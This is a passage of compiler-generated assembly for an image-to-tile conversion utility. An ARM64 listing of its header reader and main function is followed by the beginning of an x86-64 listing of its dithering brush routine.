ldr x0, [sp, #16] ; 8-byte Folded Reload
ldr x3, [sp, #64]
mov x1, #16
mov x2, #8
bl _fwrite
ldrb w8, [sp, #47]
mov x9, x8
adrp x8, _hashcount@GOTPAGE
ldr x8, [x8, _hashcount@GOTPAGEOFF]
add x9, x8, x9, lsl #2
ldr w8, [x9]
add w8, w8, #1
str w8, [x9]
b LBB3_16
LBB3_15:
ldr x8, [sp, #48]
ldr w8, [x8, #136]
str w8, [sp, #32]
b LBB3_16
LBB3_16:
ldr w8, [sp, #32]
str w8, [sp, #4] ; 4-byte Folded Spill
ldur x9, [x29, #-8]
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
subs x8, x8, x9
cset w8, eq
tbnz w8, #0, LBB3_18
b LBB3_17
LBB3_17:
bl ___stack_chk_fail
LBB3_18:
ldr w0, [sp, #4] ; 4-byte Folded Reload
ldp x29, x30, [sp, #224] ; 16-byte Folded Reload
add sp, sp, #240
ret
.cfi_endproc
; -- End function
.globl _readheader ; -- Begin function readheader
.p2align 2
_readheader: ; @readheader
.cfi_startproc
; %bb.0:
sub sp, sp, #192
.cfi_def_cfa_offset 192
stp x29, x30, [sp, #176] ; 16-byte Folded Spill
add x29, sp, #176
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
adrp x8, ___stderrp@GOTPAGE
ldr x8, [x8, ___stderrp@GOTPAGEOFF]
str x8, [sp, #32] ; 8-byte Folded Spill
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
stur x8, [x29, #-8]
str x0, [sp, #72]
str x1, [sp, #64]
str x2, [sp, #56]
str x3, [sp, #48]
ldr x2, [sp, #72]
add x0, sp, #88
str x0, [sp, #40] ; 8-byte Folded Spill
mov w1, #80
bl _fgets
ldr x0, [sp, #40] ; 8-byte Folded Reload
adrp x1, l_.str@PAGE
add x1, x1, l_.str@PAGEOFF
bl _strcmp
subs w8, w0, #0
cset w8, eq
tbnz w8, #0, LBB4_2
b LBB4_1
LBB4_1:
ldr x8, [sp, #32] ; 8-byte Folded Reload
ldr x0, [x8]
mov x9, sp
add x8, sp, #88
str x8, [x9]
adrp x1, l_.str.1@PAGE
add x1, x1, l_.str.1@PAGEOFF
bl _fprintf
str wzr, [sp, #84]
b LBB4_14
LBB4_2:
b LBB4_3
LBB4_3: ; =>This Inner Loop Header: Depth=1
ldr x2, [sp, #72]
add x0, sp, #88
mov w1, #80
bl _fgets
b LBB4_4
LBB4_4: ; in Loop: Header=BB4_3 Depth=1
ldrsb w8, [sp, #88]
subs w8, w8, #35
cset w8, eq
tbnz w8, #0, LBB4_3
b LBB4_5
LBB4_5:
ldr x10, [sp, #64]
ldr x8, [sp, #56]
mov x9, sp
str x10, [x9]
str x8, [x9, #8]
add x0, sp, #88
adrp x1, l_.str.2@PAGE
add x1, x1, l_.str.2@PAGEOFF
bl _sscanf
str w0, [sp, #28] ; 4-byte Folded Spill
subs w8, w0, #0
cset w8, eq
tbnz w8, #0, LBB4_8
b LBB4_6
LBB4_6:
ldr w8, [sp, #28] ; 4-byte Folded Reload
subs w8, w8, #1
cset w8, eq
tbnz w8, #0, LBB4_9
b LBB4_7
LBB4_7:
ldr w8, [sp, #28] ; 4-byte Folded Reload
subs w8, w8, #2
cset w8, eq
tbnz w8, #0, LBB4_12
b LBB4_13
LBB4_8:
ldr x8, [sp, #32] ; 8-byte Folded Reload
ldr x0, [x8]
mov x9, sp
add x8, sp, #88
str x8, [x9]
adrp x1, l_.str.3@PAGE
add x1, x1, l_.str.3@PAGEOFF
bl _fprintf
str wzr, [sp, #84]
b LBB4_14
LBB4_9:
ldr x0, [sp, #72]
ldr x8, [sp, #56]
mov x9, sp
str x8, [x9]
adrp x1, l_.str.4@PAGE
add x1, x1, l_.str.4@PAGEOFF
bl _fscanf
subs w8, w0, #0
cset w8, ne
tbnz w8, #0, LBB4_11
b LBB4_10
LBB4_10:
ldr x8, [sp, #32] ; 8-byte Folded Reload
ldr x0, [x8]
mov x9, sp
add x8, sp, #88
str x8, [x9]
adrp x1, l_.str.5@PAGE
add x1, x1, l_.str.5@PAGEOFF
bl _fprintf
str wzr, [sp, #84]
b LBB4_14
LBB4_11:
b LBB4_12
LBB4_12:
b LBB4_13
LBB4_13:
ldr x0, [sp, #72]
ldr x8, [sp, #48]
mov x9, sp
str x8, [x9]
adrp x1, l_.str.4@PAGE
add x1, x1, l_.str.4@PAGEOFF
bl _fscanf
subs w8, w0, #1
cset w8, eq
and w8, w8, #0x1
str w8, [sp, #84]
b LBB4_14
LBB4_14:
ldr w8, [sp, #84]
str w8, [sp, #24] ; 4-byte Folded Spill
ldur x9, [x29, #-8]
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
subs x8, x8, x9
cset w8, eq
tbnz w8, #0, LBB4_16
b LBB4_15
LBB4_15:
bl ___stack_chk_fail
LBB4_16:
ldr w0, [sp, #24] ; 4-byte Folded Reload
ldp x29, x30, [sp, #176] ; 16-byte Folded Reload
add sp, sp, #192
ret
.cfi_endproc
; -- End function
.section __TEXT,__literal8,8byte_literals
.p2align 3 ; -- Begin function main
lCPI5_0:
.quad 0x406fe00000000000 ; double 255
.section __TEXT,__text,regular,pure_instructions
.globl _main
.p2align 2
_main: ; @main
.cfi_startproc
; %bb.0:
stp x28, x27, [sp, #-32]! ; 16-byte Folded Spill
.cfi_def_cfa_offset 32
stp x29, x30, [sp, #16] ; 16-byte Folded Spill
add x29, sp, #16
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
.cfi_offset w27, -24
.cfi_offset w28, -32
sub sp, sp, #480
adrp x8, ___stderrp@GOTPAGE
ldr x8, [x8, ___stderrp@GOTPAGEOFF]
str x8, [sp, #88] ; 8-byte Folded Spill
adrp x8, _mapwidth@GOTPAGE
ldr x8, [x8, _mapwidth@GOTPAGEOFF]
str x8, [sp, #96] ; 8-byte Folded Spill
adrp x8, _mapheight@GOTPAGE
ldr x8, [x8, _mapheight@GOTPAGEOFF]
str x8, [sp, #104] ; 8-byte Folded Spill
adrp x8, _pixmap@GOTPAGE
ldr x8, [x8, _pixmap@GOTPAGEOFF]
str x8, [sp, #112] ; 8-byte Folded Spill
adrp x8, _clrgamma@GOTPAGE
ldr x8, [x8, _clrgamma@GOTPAGEOFF]
str x8, [sp, #120] ; 8-byte Folded Spill
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
stur x8, [x29, #-24]
str wzr, [sp, #212]
str w0, [sp, #208]
str x1, [sp, #200]
str wzr, [sp, #160]
b LBB5_1
LBB5_1: ; =>This Inner Loop Header: Depth=1
ldr w8, [sp, #160]
subs w8, w8, #256
cset w8, ge
tbnz w8, #0, LBB5_4
b LBB5_2
LBB5_2: ; in Loop: Header=BB5_1 Depth=1
ldr x9, [sp, #120] ; 8-byte Folded Reload
ldr w8, [sp, #160]
ldrsw x10, [sp, #160]
strb w8, [x9, x10]
b LBB5_3
LBB5_3: ; in Loop: Header=BB5_1 Depth=1
ldr w8, [sp, #160]
add w8, w8, #1
str w8, [sp, #160]
b LBB5_1
LBB5_4:
mov w8, #1
strb w8, [sp, #151]
strb wzr, [sp, #150]
b LBB5_5
LBB5_5: ; =>This Loop Header: Depth=1
; Child Loop BB5_11 Depth 2
ldr w8, [sp, #208]
subs w8, w8, #1
cset w8, le
mov w9, #0
str w9, [sp, #84] ; 4-byte Folded Spill
tbnz w8, #0, LBB5_7
b LBB5_6
LBB5_6: ; in Loop: Header=BB5_5 Depth=1
ldr x8, [sp, #200]
ldr x8, [x8, #8]
ldrsb w8, [x8]
subs w8, w8, #45
cset w8, eq
str w8, [sp, #84] ; 4-byte Folded Spill
b LBB5_7
LBB5_7: ; in Loop: Header=BB5_5 Depth=1
ldr w8, [sp, #84] ; 4-byte Folded Reload
tbz w8, #0, LBB5_22
b LBB5_8
LBB5_8: ; in Loop: Header=BB5_5 Depth=1
ldr w8, [sp, #208]
subs w8, w8, #2
cset w8, le
tbnz w8, #0, LBB5_15
b LBB5_9
LBB5_9: ; in Loop: Header=BB5_5 Depth=1
ldr x8, [sp, #200]
ldr x8, [x8, #8]
ldrsb w8, [x8, #1]
subs w8, w8, #103
cset w8, ne
tbnz w8, #0, LBB5_15
b LBB5_10
LBB5_10: ; in Loop: Header=BB5_5 Depth=1
ldr x8, [sp, #200]
ldr x0, [x8, #16]
bl _atof
fcvt s0, d0
str s0, [sp, #136]
str wzr, [sp, #160]
b LBB5_11
LBB5_11: ; Parent Loop BB5_5 Depth=1
; => This Inner Loop Header: Depth=2
ldr w8, [sp, #160]
subs w8, w8, #256
cset w8, ge
tbnz w8, #0, LBB5_14
b LBB5_12
LBB5_12: ; in Loop: Header=BB5_11 Depth=2
ldr s0, [sp, #160]
scvtf s0, s0
fcvt d0, s0
adrp x8, lCPI5_0@PAGE
ldr d1, [x8, lCPI5_0@PAGEOFF]
str d1, [sp, #72] ; 8-byte Folded Spill
fdiv d0, d0, d1
ldr s1, [sp, #136]
fcvt d1, s1
bl _pow
ldr d1, [sp, #72] ; 8-byte Folded Reload
ldr x9, [sp, #120] ; 8-byte Folded Reload
fmul d0, d0, d1
fcvtzu w8, d0
ldrsw x10, [sp, #160]
strb w8, [x9, x10]
b LBB5_13
LBB5_13: ; in Loop: Header=BB5_11 Depth=2
ldr w8, [sp, #160]
add w8, w8, #1
str w8, [sp, #160]
b LBB5_11
LBB5_14: ; in Loop: Header=BB5_5 Depth=1
ldr w8, [sp, #208]
subs w8, w8, #1
str w8, [sp, #208]
ldr x8, [sp, #200]
add x8, x8, #8
str x8, [sp, #200]
b LBB5_21
LBB5_15: ; in Loop: Header=BB5_5 Depth=1
ldr x8, [sp, #200]
ldr x8, [x8, #8]
ldrsb w8, [x8, #1]
subs w8, w8, #110
cset w8, ne
tbnz w8, #0, LBB5_17
b LBB5_16
LBB5_16: ; in Loop: Header=BB5_5 Depth=1
strb wzr, [sp, #151]
b LBB5_20
LBB5_17: ; in Loop: Header=BB5_5 Depth=1
ldr x8, [sp, #200]
ldr x8, [x8, #8]
ldrsb w8, [x8, #1]
subs w8, w8, #115
cset w8, ne
tbnz w8, #0, LBB5_19
b LBB5_18
LBB5_18: ; in Loop: Header=BB5_5 Depth=1
mov w8, #1
strb w8, [sp, #150]
b LBB5_19
LBB5_19: ; in Loop: Header=BB5_5 Depth=1
b LBB5_20
LBB5_20: ; in Loop: Header=BB5_5 Depth=1
b LBB5_21
LBB5_21: ; in Loop: Header=BB5_5 Depth=1
ldr w8, [sp, #208]
subs w8, w8, #1
str w8, [sp, #208]
ldr x8, [sp, #200]
add x8, x8, #8
str x8, [sp, #200]
b LBB5_5
LBB5_22:
ldr w8, [sp, #208]
subs w8, w8, #1
cset w8, le
tbnz w8, #0, LBB5_26
b LBB5_23
LBB5_23:
ldr x8, [sp, #200]
ldr x8, [x8, #8]
str x8, [sp, #128]
ldr x8, [sp, #128]
mov x9, sp
str x8, [x9]
sub x0, x29, #120
str x0, [sp, #64] ; 8-byte Folded Spill
mov w1, #0
mov x2, #80
adrp x3, l_.str.6@PAGE
add x3, x3, l_.str.6@PAGEOFF
bl ___sprintf_chk
ldr x0, [sp, #64] ; 8-byte Folded Reload
adrp x1, l_.str.7@PAGE
add x1, x1, l_.str.7@PAGEOFF
bl _fopen
mov x8, x0
str x8, [sp, #192]
subs x8, x0, #0
cset w8, ne
tbnz w8, #0, LBB5_25
b LBB5_24
LBB5_24:
ldr x8, [sp, #88] ; 8-byte Folded Reload
ldr x0, [x8]
mov x9, sp
sub x8, x29, #120
str x8, [x9]
adrp x1, l_.str.8@PAGE
add x1, x1, l_.str.8@PAGEOFF
bl _fprintf
mov w8, #-1
str w8, [sp, #212]
b LBB5_58
LBB5_25:
b LBB5_27
LBB5_26:
ldr x8, [sp, #88] ; 8-byte Folded Reload
ldr x0, [x8]
adrp x1, l_.str.9@PAGE
add x1, x1, l_.str.9@PAGEOFF
bl _fprintf
mov w8, #-1
str w8, [sp, #212]
b LBB5_58
LBB5_27:
ldr x0, [sp, #192]
add x1, sp, #172
add x2, sp, #168
add x3, sp, #164
bl _readheader
subs w8, w0, #0
cset w8, ne
tbnz w8, #0, LBB5_29
b LBB5_28
LBB5_28:
ldr x8, [sp, #88] ; 8-byte Folded Reload
ldr x0, [x8]
adrp x1, l_.str.10@PAGE
add x1, x1, l_.str.10@PAGEOFF
bl _fprintf
mov w8, #-1
str w8, [sp, #212]
b LBB5_58
LBB5_29:
ldr x9, [sp, #104] ; 8-byte Folded Reload
ldr x8, [sp, #96] ; 8-byte Folded Reload
ldr w10, [sp, #172]
add w10, w10, #15
and w10, w10, #0xfff0
str w10, [x8]
ldr w10, [sp, #168]
add w10, w10, #15
and w10, w10, #0xfff0
str w10, [x9]
ldr w8, [x8]
ldr w9, [x9]
mul w8, w8, w9
mov w9, #2
str w9, [sp, #60] ; 4-byte Folded Spill
sdiv w9, w8, w9
; implicit-def: $x8
mov x8, x9
sxtw x0, w8
bl _malloc
ldr x11, [sp, #112] ; 8-byte Folded Reload
ldr x8, [sp, #96] ; 8-byte Folded Reload
ldr x10, [sp, #104] ; 8-byte Folded Reload
ldr w9, [sp, #60] ; 4-byte Folded Reload
str x0, [x11]
ldr x0, [x11]
ldr w8, [x8]
ldr w10, [x10]
mul w8, w8, w10
sdiv w9, w8, w9
; implicit-def: $x8
mov x8, x9
sxtw x2, w8
mov w1, #0
mov x3, #-1
bl ___memset_chk
str wzr, [sp, #156]
b LBB5_30
LBB5_30: ; =>This Loop Header: Depth=1
; Child Loop BB5_32 Depth 2
ldr w8, [sp, #156]
ldr w9, [sp, #168]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB5_40
b LBB5_31
LBB5_31: ; in Loop: Header=BB5_30 Depth=1
str wzr, [sp, #160]
b LBB5_32
LBB5_32: ; Parent Loop BB5_30 Depth=1
; => This Inner Loop Header: Depth=2
ldr w8, [sp, #160]
ldr w9, [sp, #172]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB5_38
b LBB5_33
LBB5_33: ; in Loop: Header=BB5_32 Depth=2
ldr x0, [sp, #192]
bl _getc
ldr x8, [sp, #120] ; 8-byte Folded Reload
add x8, x8, w0, sxtw
ldrb w8, [x8]
strb w8, [sp, #149]
ldr x0, [sp, #192]
bl _getc
ldr x8, [sp, #120] ; 8-byte Folded Reload
add x8, x8, w0, sxtw
ldrb w8, [x8]
strb w8, [sp, #148]
ldr x0, [sp, #192]
bl _getc
ldr x8, [sp, #120] ; 8-byte Folded Reload
add x8, x8, w0, sxtw
ldrb w8, [x8]
strb w8, [sp, #147]
ldrb w8, [sp, #151]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB5_35
b LBB5_34
LBB5_34: ; in Loop: Header=BB5_32 Depth=2
ldr w0, [sp, #160]
ldr w1, [sp, #156]
ldrb w2, [sp, #149]
ldrb w3, [sp, #148]
ldrb w4, [sp, #147]
bl _plotrgb
b LBB5_36
LBB5_35: ; in Loop: Header=BB5_32 Depth=2
ldr w8, [sp, #160]
str w8, [sp, #56] ; 4-byte Folded Spill
ldr w8, [sp, #156]
str w8, [sp, #52] ; 4-byte Folded Spill
ldrb w0, [sp, #149]
ldrb w1, [sp, #148]
ldrb w2, [sp, #147]
sub x3, x29, #40
bl _brush
ldr w1, [sp, #52] ; 4-byte Folded Reload
mov x8, x0
ldr w0, [sp, #56] ; 4-byte Folded Reload
and w2, w8, #0xff
bl _plot
b LBB5_36
LBB5_36: ; in Loop: Header=BB5_32 Depth=2
b LBB5_37
LBB5_37: ; in Loop: Header=BB5_32 Depth=2
ldr w8, [sp, #160]
add w8, w8, #1
str w8, [sp, #160]
b LBB5_32
LBB5_38: ; in Loop: Header=BB5_30 Depth=1
b LBB5_39
LBB5_39: ; in Loop: Header=BB5_30 Depth=1
ldr w8, [sp, #156]
add w8, w8, #1
str w8, [sp, #156]
b LBB5_30
LBB5_40:
ldr x0, [sp, #192]
bl _fclose
ldr x8, [sp, #128]
mov x9, sp
str x8, [x9]
sub x0, x29, #200
mov w1, #0
str w1, [sp, #36] ; 4-byte Folded Spill
mov x2, #80
str x2, [sp, #40] ; 8-byte Folded Spill
adrp x3, l_.str.11@PAGE
add x3, x3, l_.str.11@PAGEOFF
bl ___sprintf_chk
ldr w1, [sp, #36] ; 4-byte Folded Reload
ldr x2, [sp, #40] ; 8-byte Folded Reload
ldr x8, [sp, #128]
mov x9, sp
str x8, [x9]
add x0, sp, #216
adrp x3, l_.str.12@PAGE
add x3, x3, l_.str.12@PAGEOFF
bl ___sprintf_chk
str wzr, [sp, #152]
b LBB5_41
LBB5_41: ; =>This Inner Loop Header: Depth=1
ldr w8, [sp, #152]
subs w8, w8, #256
cset w8, ge
tbnz w8, #0, LBB5_44
b LBB5_42
LBB5_42: ; in Loop: Header=BB5_41 Depth=1
ldrsw x10, [sp, #152]
adrp x9, _hashlist@GOTPAGE
ldr x9, [x9, _hashlist@GOTPAGEOFF]
mov x8, #0
str x8, [x9, x10, lsl #3]
ldrsw x10, [sp, #152]
adrp x9, _hashcount@GOTPAGE
ldr x9, [x9, _hashcount@GOTPAGEOFF]
mov w8, #0
str w8, [x9, x10, lsl #2]
b LBB5_43
LBB5_43: ; in Loop: Header=BB5_41 Depth=1
ldr w8, [sp, #152]
add w8, w8, #1
str w8, [sp, #152]
b LBB5_41
LBB5_44:
sub x0, x29, #200
adrp x1, l_.str.13@PAGE
add x1, x1, l_.str.13@PAGEOFF
str x1, [sp, #24] ; 8-byte Folded Spill
bl _fopen
ldr x1, [sp, #24] ; 8-byte Folded Reload
str x0, [sp, #184]
add x0, sp, #216
bl _fopen
ldr x10, [sp, #96] ; 8-byte Folded Reload
ldr x8, [sp, #104] ; 8-byte Folded Reload
str x0, [sp, #176]
ldr w11, [x10]
mov w9, #16
sdiv w11, w11, w9
add x0, sp, #143
strb w11, [sp, #143]
ldr w10, [x10]
sdiv w10, w10, w9
asr w10, w10, #8
strb w10, [sp, #144]
ldr w10, [x8]
sdiv w10, w10, w9
strb w10, [sp, #145]
ldr w8, [x8]
sdiv w8, w8, w9
asr w8, w8, #8
strb w8, [sp, #146]
ldr x3, [sp, #176]
mov x1, #1
mov x2, #4
bl _fwrite
str wzr, [sp, #156]
b LBB5_45
LBB5_45: ; =>This Loop Header: Depth=1
; Child Loop BB5_47 Depth 2
ldr x9, [sp, #104] ; 8-byte Folded Reload
ldr w8, [sp, #156]
ldr w9, [x9]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB5_52
b LBB5_46
LBB5_46: ; in Loop: Header=BB5_45 Depth=1
str wzr, [sp, #160]
b LBB5_47
LBB5_47: ; Parent Loop BB5_45 Depth=1
; => This Inner Loop Header: Depth=2
ldr x9, [sp, #96] ; 8-byte Folded Reload
ldr w8, [sp, #160]
ldr w9, [x9]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB5_50
b LBB5_48
LBB5_48: ; in Loop: Header=BB5_47 Depth=2
ldr x10, [sp, #96] ; 8-byte Folded Reload
ldr x8, [sp, #112] ; 8-byte Folded Reload
ldr x0, [sp, #184]
ldr x8, [x8]
ldr w9, [sp, #156]
ldr w10, [x10]
mul w9, w9, w10
ldr w10, [sp, #160]
add w9, w9, w10
mov w10, #2
sdiv w9, w9, w10
add x1, x8, w9, sxtw
bl _addtile
str w0, [sp, #152]
ldr w8, [sp, #152]
add x0, sp, #143
strb w8, [sp, #143]
ldr w8, [sp, #152]
asr w8, w8, #8
strb w8, [sp, #144]
ldr x3, [sp, #176]
mov x1, #1
mov x2, #2
bl _fwrite
b LBB5_49
LBB5_49: ; in Loop: Header=BB5_47 Depth=2
ldr w8, [sp, #160]
add w8, w8, #16
str w8, [sp, #160]
b LBB5_47
LBB5_50: ; in Loop: Header=BB5_45 Depth=1
b LBB5_51
LBB5_51: ; in Loop: Header=BB5_45 Depth=1
ldr w8, [sp, #156]
add w8, w8, #16
str w8, [sp, #156]
b LBB5_45
LBB5_52:
ldr x0, [sp, #184]
bl _fclose
ldr x0, [sp, #176]
bl _fclose
ldrb w8, [sp, #150]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB5_58
b LBB5_53
LBB5_53:
str wzr, [sp, #152]
b LBB5_54
LBB5_54: ; =>This Inner Loop Header: Depth=1
ldr w8, [sp, #152]
subs w8, w8, #256
cset w8, ge
tbnz w8, #0, LBB5_57
b LBB5_55
LBB5_55: ; in Loop: Header=BB5_54 Depth=1
ldr w8, [sp, #152]
; implicit-def: $x10
mov x10, x8
ldrsw x9, [sp, #152]
adrp x8, _hashcount@GOTPAGE
ldr x8, [x8, _hashcount@GOTPAGEOFF]
ldr w9, [x8, x9, lsl #2]
; implicit-def: $x8
mov x8, x9
mov x9, sp
str x10, [x9]
str x8, [x9, #8]
adrp x0, l_.str.14@PAGE
add x0, x0, l_.str.14@PAGEOFF
bl _printf
b LBB5_56
LBB5_56: ; in Loop: Header=BB5_54 Depth=1
ldr w8, [sp, #152]
add w8, w8, #1
str w8, [sp, #152]
b LBB5_54
LBB5_57:
adrp x8, _tilecount@PAGE
ldr w9, [x8, _tilecount@PAGEOFF]
; implicit-def: $x8
mov x8, x9
mov x9, sp
str x8, [x9]
adrp x0, l_.str.15@PAGE
add x0, x0, l_.str.15@PAGEOFF
bl _printf
b LBB5_58
LBB5_58:
ldr w8, [sp, #212]
str w8, [sp, #20] ; 4-byte Folded Spill
ldur x9, [x29, #-24]
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
subs x8, x8, x9
cset w8, eq
tbnz w8, #0, LBB5_60
b LBB5_59
LBB5_59:
bl ___stack_chk_fail
LBB5_60:
ldr w0, [sp, #20] ; 4-byte Folded Reload
add sp, sp, #480
ldp x29, x30, [sp, #16] ; 16-byte Folded Reload
ldp x28, x27, [sp], #32 ; 16-byte Folded Reload
ret
.cfi_endproc
; -- End function
.globl _tilecount ; @tilecount
.zerofill __DATA,__common,_tilecount,4,2
.section __DATA,__data
.p2align 2 ; @bdithmask
_bdithmask:
.long 0 ; 0x0
.long 32768 ; 0x8000
.long 32800 ; 0x8020
.long 32928 ; 0x80a0
.long 41120 ; 0xa0a0
.long 42144 ; 0xa4a0
.long 42145 ; 0xa4a1
.long 42149 ; 0xa4a5
.long 42405 ; 0xa5a5
.long 44453 ; 0xada5
.long 44455 ; 0xada7
.long 44463 ; 0xadaf
.long 44975 ; 0xafaf
.long 61359 ; 0xefaf
.long 61375 ; 0xefbf
.long 65535 ; 0xffff
.p2align 2 ; @ddithmask
_ddithmask:
.long 0 ; 0x0
.long 32768 ; 0x8000
.long 32800 ; 0x8020
.long 32928 ; 0x80a0
.long 41120 ; 0xa0a0
.long 42144 ; 0xa4a0
.long 42145 ; 0xa4a1
.long 42149 ; 0xa4a5
.long 42405 ; 0xa5a5
.long 44453 ; 0xada5
.long 44455 ; 0xada7
.long 44463 ; 0xadaf
.long 44975 ; 0xafaf
.long 61359 ; 0xefaf
.long 61375 ; 0xefbf
.long 61439 ; 0xefff
.comm _pixmap,8,3 ; @pixmap
.comm _mapwidth,4,2 ; @mapwidth
.comm _hashlist,2048,3 ; @hashlist
.comm _hashcount,1024,2 ; @hashcount
.section __TEXT,__cstring,cstring_literals
l_.str: ; @.str
.asciz "P6\n"
l_.str.1: ; @.str.1
.asciz "PBM header: Missing P6 %s\n"
l_.str.2: ; @.str.2
.asciz "%d %d\n"
l_.str.3: ; @.str.3
.asciz "PBM header: Missing width %s\n"
l_.str.4: ; @.str.4
.asciz "%d\n"
l_.str.5: ; @.str.5
.asciz "PBM header: Missing height %s\n"
.comm _clrgamma,256,0 ; @clrgamma
l_.str.6: ; @.str.6
.asciz "%s.pnm"
l_.str.7: ; @.str.7
.asciz "rb"
l_.str.8: ; @.str.8
.asciz "Can't open %s\n"
l_.str.9: ; @.str.9
.asciz "Missing basename\n"
l_.str.10: ; @.str.10
.asciz "Not a valid PBM file.\n"
.comm _mapheight,4,2 ; @mapheight
l_.str.11: ; @.str.11
.asciz "%s.set"
l_.str.12: ; @.str.12
.asciz "%s.map"
l_.str.13: ; @.str.13
.asciz "wb"
l_.str.14: ; @.str.14
.asciz "Hash count[%d]: %d\n"
l_.str.15: ; @.str.15
.asciz "Tile count: %d\n"
.comm _pbmfile,8,3 ; @pbmfile
.comm _pbmwidth,4,2 ; @pbmwidth
.comm _pbmheight,4,2 ; @pbmheight
.comm _pbmdepth,4,2 ; @pbmdepth
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _brush ## -- Begin function brush
.p2align 4, 0x90
_brush: ## @brush
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
movb %sil, %al
movb %dil, %sil
movb %sil, -1(%rbp)
movb %al, -2(%rbp)
movl %edx, -8(%rbp)
movq %rcx, -16(%rbp)
movzbl -1(%rbp), %eax
movzbl -2(%rbp), %ecx
cmpl %ecx, %eax
jl LBB0_3
## %bb.1:
movzbl -1(%rbp), %eax
cmpl -8(%rbp), %eax
jb LBB0_3
## %bb.2:
movb -1(%rbp), %al
movb %al, -18(%rbp)
jmp LBB0_8
LBB0_3:
movzbl -2(%rbp), %eax
movzbl -1(%rbp), %ecx
cmpl %ecx, %eax
jl LBB0_6
## %bb.4:
movzbl -2(%rbp), %eax
cmpl -8(%rbp), %eax
jb LBB0_6
## %bb.5:
movb -2(%rbp), %al
movb %al, -18(%rbp)
jmp LBB0_7
LBB0_6:
movl -8(%rbp), %eax
## kill: def $al killed $al killed $eax
movb %al, -18(%rbp)
LBB0_7:
jmp LBB0_8
LBB0_8:
movzbl -18(%rbp), %eax
cmpl $127, %eax
jle LBB0_10
## %bb.9:
movzbl -18(%rbp), %eax
sarl $3, %eax
andl $15, %eax
movslq %eax, %rcx
leaq _bdithmask(%rip), %rax
movl (%rax,%rcx,4), %ecx
movq -16(%rbp), %rax
movl %ecx, 12(%rax)
movzbl -1(%rbp), %eax
shll $4, %eax
movzbl -18(%rbp), %ecx
addl $8, %ecx
cltd
idivl %ecx
movslq %eax, %rcx
leaq _bdithmask(%rip), %rax
movl (%rax,%rcx,4), %ecx
movq -16(%rbp), %rax
movl %ecx, 8(%rax)
movzbl -2(%rbp), %eax
shll $4, %eax
movzbl -18(%rbp), %ecx
addl $8, %ecx
cltd
idivl %ecx
movslq %eax, %rcx
leaq _bdithmask(%rip), %rax
movl (%rax,%rcx,4), %ecx
movq -16(%rbp), %rax
movl %ecx, 4(%rax)
movl -8(%rbp), %eax
shll $4, %eax
movzbl -18(%rbp), %ecx
addl $8, %ecx
xorl %edx, %edx
divl %ecx
movl %eax, %eax
movl %eax, %ecx
leaq _bdithmask(%rip), %rax
movl (%rax,%rcx,4), %ecx
movq -16(%rbp), %rax
movl %ecx, (%rax)
movzbl -1(%rbp), %eax
andl $128, %eax
sarl $5, %eax
orl $8, %eax
movzbl -2(%rbp), %ecx
andl $128, %ecx
sarl $6, %ecx
orl %ecx, %eax
movl -8(%rbp), %ecx
andl $128, %ecx
shrl $7, %ecx
orl %ecx, %eax
## kill: def $al killed $al killed $eax
movb %al, -17(%rbp)
jmp LBB0_17
LBB0_10:
movzbl -18(%rbp), %eax
movzbl -1(%rbp), %ecx
subl %ecx, %eax
movzbl -18(%rbp), %ecx
movzbl -2(%rbp), %edx
subl %edx, %ecx
addl %ecx, %eax
movzbl -18(%rbp), %ecx
subl -8(%rbp), %ecx
addl %ecx, %eax
cmpl $8, %eax
jae LBB0_15
## %bb.11:
movzbl -18(%rbp), %eax
cmpl $63, %eax
jle LBB0_13
## %bb.12:
movzbl -18(%rbp), %eax
subl $64, %eax
sarl $2, %eax
movslq %eax, %rcx
leaq _ddithmask(%rip), %rax
movl (%rax,%rcx,4), %ecx
xorl $-1, %ecx
movq -16(%rbp), %rax
movl %ecx, 12(%rax)
movzbl -18(%rbp), %eax
subl $64, %eax
sarl $2, %eax
movslq %eax, %rcx
leaq _ddithmask(%rip), %rax
movl (%rax,%rcx,4), %ecx
movq -16(%rbp), %rax
movl %ecx, (%rax)
movq -16(%rbp), %rax
movl %ecx, 4(%rax)
movq -16(%rbp), %rax
movl %ecx, 8(%rax)
movb $7, -17(%rbp)
jmp LBB0_14
LBB0_13:
movzbl -18(%rbp), %eax
sarl $2, %eax
movslq %eax, %rcx
leaq _ddithmask(%rip), %rax
movl (%rax,%rcx,4), %ecx
movq -16(%rbp), %rax
movl %ecx, 12(%rax)
movq -16(%rbp), %rax
movl $0, 8(%rax)
movq -16(%rbp), %rax
movl $0, 4(%rax)
movq -16(%rbp), %rax
movl $0, (%rax)
movzbl -18(%rbp), %edx
xorl %eax, %eax
movl $8, %ecx
cmpl $31, %edx
cmovgl %ecx, %eax
## kill: def $al killed $al killed $eax
movb %al, -17(%rbp)
LBB0_14:
jmp LBB0_16
LBB0_15:
movq -16(%rbp), %rax
movl $0, 12(%rax)
movzbl -1(%rbp), %eax
sarl $3, %eax
movslq %eax, %rcx
leaq _ddithmask(%rip), %rax
movl (%rax,%rcx,4), %ecx
movq -16(%rbp), %rax
movl %ecx, 8(%rax)
movzbl -2(%rbp), %eax
sarl $3, %eax
movslq %eax, %rcx
leaq _ddithmask(%rip), %rax
movl (%rax,%rcx,4), %ecx
